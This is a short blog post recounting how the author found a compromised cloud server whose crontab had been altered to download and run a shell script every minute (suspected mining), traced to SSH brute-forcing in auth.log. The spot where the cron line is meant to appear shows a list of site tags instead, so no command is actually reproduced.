February 15, 2020

Server Got Hacked, Crontab Has Been Modified

A few days ago, one of the servers used by my worker’s developer friends often experienced a down (assumed to be server A). Initially I thought it was caused by the very few available server resources and increasing number of processes carried out by applications.

When checking server resources, it turns out that CPU usage has reached 100%.

What process continues to make CPU usage up to 100%? Whereas on other servers (assumed to be server B) with the same application process, CPU usage does not reach 100%.

Okay, maybe on server A there are additional applications that are running so I have to find the application where. I checked in systemd, nothing. I checked nohup that was running, nothing too, I checked cron, apparently there was an additional process. The process is run every minute, I asked the developer team eh apparently no one entered the process. That means my server has been hacked.

Here is the cron that the person updated:

Linux, Unix, BSD, MacOS, Komunitas Pengguna Linux Indonesia, KPLI Klaten, KPLI Bulukumba, MikroTik, MikroTik Indonesia, FreeBSD, FreeBSD Indonesia, Cisco, Cisco Indonesia, BLC Telkom Klaten, Ansible, Nginx, Apache2, Caddy Server, Ayo Belajar Linux, Cloud Computing, e-Learning, Open edX, Proxmox, Sendy, Microsoft SQL Server, MySQL, PostgreSQL, Lets Encrypt, Case Study, Atlassian, Virtualization, Faizar Septiawan, Icar, siBunglonGanteng, siBunglonLabs, Orang Ganteng

The process, every minute he downloads the sh file, then extracted. No wonder the server is often down. When the process was copied and pasted into the Google search engine, apparently many also experienced the same thing that was hacked cronnya. 80% of people who experience the same thing, when the link is opened turns out to run the mining process. But when I opened the link on my server, it turned out that the link was dead too so I didn’t know what process was running after downloading the bash file.

Then where did the person enter to be able to update the cron file? This question is the answer is still gray or unclear. In forums that discuss this on Google or in other forums, no one has yet ascertained where these people have been put.

But when I checked the authentication log on server A, it turns out that my server is also being brute force via ssh, something is interesting, it turns out that server A has been brute force for a few days a month🤣🤣🤣. No wonder he often down, there is a process that runs every minute + there is another brute force🤣

Btw, I found out about the brute force when checking in the /var/log/auth.log file, when checking the brute force start date, here I also only found out when the cron file was updated (when the cron script that I showed above, entered into server). Cron is entered the day after the server is brute-force, and the server is brute-force a few minutes after the server is generated. Btw, server A was generated in one of the cloud services.

90% of the articles I read related to this case, it is recommended to reinstall the server operating system.

Maybe that’s just what I want to convey through this article. If anyone wants to share about this issue, please comment 😁